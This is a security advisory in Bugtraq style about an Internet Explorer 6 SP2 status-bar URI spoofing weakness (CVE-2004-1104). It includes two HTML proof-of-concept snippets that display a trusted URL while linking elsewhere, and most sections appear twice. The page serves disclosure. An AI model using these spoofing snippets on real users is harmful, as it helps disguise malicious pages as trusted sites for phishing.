Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
BID:11565
Info
Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
| Bugtraq ID: | 11565 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2004-1104 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 30 2004 12:00AM |
| Updated: | Jul 12 2009 08:06AM |
| Credit: | "[email protected]" <[email protected]> disclosed this weakness. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP2 - do not use |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
Microsoft Internet Explorer is reported prone to a URI obfuscation weakness. The issue is due to a failure of the affected application to properly handle specially crafted HTML anchor URI tags and various form tags.
This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to originate from a trusted location.
This vulnerability is reported to affect Internet Explorer 6 SP2, other versions might also be affected.
This issue is similar to BID 10023.
Microsoft Internet Explorer is reported prone to a URI obfuscation weakness. The issue is due to a failure of the affected application to properly handle specially crafted HTML anchor URI tags and various form tags.
This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to originate from a trusted location.
This vulnerability is reported to affect Internet Explorer 6 SP2, other versions might also be affected.
This issue is similar to BID 10023.
Exploit / POC
Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
The following example is available. This example embeds an HTML form between malformed anchor, '<a>', tags:
<base href="http://www.example1.com">
<a href=><form action="http://www.example2.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.example1.com></form></a>
Another proof of concept exploit has been made available. This method employs the 'id' parameter embedded inside an anchor tag that is controlled by a 'label' tag, allowing the label tag to control what value is presented to an unsuspecting user:
<body style="color: WindowText; background-color: Window;">
<div>IE/OE Restricted Zone Status Bar Spoofing</div>
<div>Tested on Windows XP with SP2 installed.</div>
<p><a id="SPOOF" href="http://www.example.com/?maliciousContents"></a></p>
<div>
<a href="http://www.example.com/?trustedSite">
<table>
<caption>
<a href="http://www.example.com/?trustedSite ">
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
http://www.example.com/?trustedSite
</u>
</label>
</a>
</caption>
</table>
</a>
</div>
The above proof of concept exploit can also be viewed at the following site:
http://habaneronetworks.com/viewArticle.php?ID=140
The following example is available. This example embeds an HTML form between malformed anchor, '<a>', tags:
<base href="http://www.example1.com">
<a href=><form action="http://www.example2.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.example1.com></form></a>
Another proof of concept exploit has been made available. This method employs the 'id' parameter embedded inside an anchor tag that is controlled by a 'label' tag, allowing the label tag to control what value is presented to an unsuspecting user:
<body style="color: WindowText; background-color: Window;">
<div>IE/OE Restricted Zone Status Bar Spoofing</div>
<div>Tested on Windows XP with SP2 installed.</div>
<p><a id="SPOOF" href="http://www.example.com/?maliciousContents"></a></p>
<div>
<a href="http://www.example.com/?trustedSite">
<table>
<caption>
<a href="http://www.example.com/?trustedSite ">
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
http://www.example.com/?trustedSite
</u>
</label>
</a>
</caption>
</table>
</a>
</div>
The above proof of concept exploit can also be viewed at the following site:
http://habaneronetworks.com/viewArticle.php?ID=140
Solution / Fix
Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
References:
References: